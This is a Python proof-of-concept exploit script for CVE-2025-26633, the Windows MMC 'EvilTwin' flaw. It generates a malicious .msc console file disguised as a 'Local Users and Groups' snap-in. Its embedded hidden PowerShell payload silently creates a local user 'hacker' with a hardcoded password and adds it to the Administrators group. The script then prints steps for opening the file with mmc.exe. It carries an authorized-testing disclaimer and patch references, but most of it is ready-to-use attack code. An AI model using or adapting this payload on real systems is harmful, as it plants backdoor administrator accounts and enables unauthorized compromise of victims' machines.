#!/usr/bin/env python3 # Exploit Title: Microsoft MMC MSC EvilTwin - Local Admin Creation # Date: 2025-11-22 # Author: Mohammed Idrees Banyamer # Author Country: Jordan # GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.microsoft.com # Software Link: N/A (built-in Windows component - mmc.exe) # Version: Windows 10 all editions, Windows 11 all editions, Windows Server 2016-2025 # Tested on: Windows 11 24H2 (unpatched), Windows 10 22H2 (unpatched) # CVE: CVE-2025-26633 # CVSS: 7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H # Category: Local # Platform: Windows # CRITICAL: This is a post-exploitation / living-off-the-land technique widely used in real attacks # Including: Zero-day at time of disclosure (March 2025), actively exploited by Water Gamayun APT # Impact: Arbitrary code execution with the privileges of the user opening the .msc file # Fix: Apply Microsoft Patch Tuesday March 2025 updates (e.g., KB5053602 and later) # Advisory: https://www.zerodayinitiative.com/advisories/ZDI-25-25-150/ # Patch: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26633 # Target: Unpatched Windows systems (pre March 2025 patches) # CVE-2025-26633 Proof of Concept – Add Local Administrator Account # Use ONLY in authorized penetration testing or isolated research labs import os import xml.etree.ElementTree as ET # PAYLOAD: Adds local administrator account "hacker" silently PAYLOAD = ( 'powershell.exe -NoP -W Hidden -C "' '$user = \\\'hacker\\\'; ' '$pass = ConvertTo-SecureString \\\'P@ssw0rd123!\\\' -AsPlainText -Force; ' 'New-LocalUser -Name $user -Password $pass -FullName \\\'Lab User\\\' ' '-Description \\\'Research account\\\' -ErrorAction SilentlyContinue; ' 'Add-LocalGroupMember -Group \\\'Administrators\\\' -Member $user ' '-ErrorAction SilentlyContinue; ' 'Write-Host \\\'[+] User hacker:P@ssw0rd123! added to Administrators\\\'"' ) def create_evil_msc(filename="CVE-2025-26633-AddAdmin.msc"): root = ET.Element("MMC_ConsoleFile", ConsoleVersion="3.0") string_table = ET.SubElement(root, "StringTable") ET.SubElement(string_table, "String", id="1").text = "Local Users and Groups" ET.SubElement(string_table, "String", id="2").text = "Security Research Snap-in" snapins = ET.SubElement(root, "SnapIns") snapin = ET.SubElement(snapins, "SnapIn") ET.SubElement(snapin, "Name").text = "{7B8B9A1C-2D3E-4F5A-9B6C-1A2B3C4D5E6F}" ET.SubElement(snapin, "Description").text = "Custom Administration Tool" actions = ET.SubElement(snapin, "Actions") action = ET.SubElement(actions, "Action") ET.SubElement(action, "RunCommand").text = PAYLOAD ET.SubElement(action, "Name").text = "AddLocalAdmin" tree = ET.ElementTree(root) tree.write(filename, encoding="utf-16", xml_declaration=True) print(f"[+] Malicious .msc file successfully created: {filename}") def main(): msc_file = "CVE-2025-26633-AddAdmin.msc" create_evil_msc(msc_file) print("\n[+] Next step (execute inside vulnerable target or lab VM):") print(f" mmc.exe \"{os.path.abspath(msc_file)}\"\n") print("[!] Instant local admin account will be created:") print(" Username : hacker") print(" Password : P@ssw0rd123!") print(" Verify with: net localgroup administrators") if __name__ == "__main__": main()